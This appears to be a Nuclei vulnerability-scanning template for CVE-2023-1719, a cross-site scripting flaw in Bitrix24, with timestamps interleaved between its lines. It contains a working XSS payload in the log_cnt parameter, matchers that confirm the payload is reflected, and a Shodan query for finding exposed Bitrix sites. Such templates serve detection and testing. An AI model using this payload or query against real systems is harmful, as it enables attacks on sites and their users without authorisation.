2023-11-06 16:45:38 +00:00
id : CVE-2023-1719
info :
2023-11-07 14:39:24 +00:00
name : Bitrix Component - Cross-Site Scripting
2023-11-06 16:45:38 +00:00
author : DhiyaneshDk
2023-11-10 09:15:01 +00:00
severity : critical
2023-11-06 16:45:38 +00:00
description : |
Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim’
reference :
- https://starlabs.sg/advisories/23/23-1719/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1719
classification :
2023-11-10 09:15:01 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2023-11-06 16:45:38 +00:00
cve-id : CVE-2023-1719
cwe-id : CWE-665
2023-11-10 17:07:52 +00:00
epss-score : 0.02807
2024-01-14 13:49:27 +00:00
epss-percentile : 0.89587
2023-11-10 09:15:01 +00:00
cpe : cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:*
2023-11-06 16:45:38 +00:00
metadata :
2023-11-07 14:39:24 +00:00
verified : true
2023-11-07 14:54:31 +00:00
max-request : 1
2023-11-06 16:45:38 +00:00
vendor : bitrix24
product : bitrix24
2023-11-07 14:54:31 +00:00
shodan-query : html:"/bitrix/"
2024-01-14 09:21:50 +00:00
tags : cve2023,cve,bitrix,xss,bitrix24
2023-11-06 16:45:38 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>"
matchers-condition : and
matchers :
- type : word
part : body
words :
- "'LOG_CNT':"
- "<img onerror=alert(document.domain) src=1>"
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2024-01-26 08:31:11 +00:00
# digest: 4a0a00473045022018dcc8bec6d27c60fd722a56d8310ee01380c42efde6680eba35b5dfca48aae2022100e10f49c69f6c593d4b4f33a6945c7f89ec821577f7842e716a4bceebf216cc8b:922c64590222798bb761d5b6d8e72950
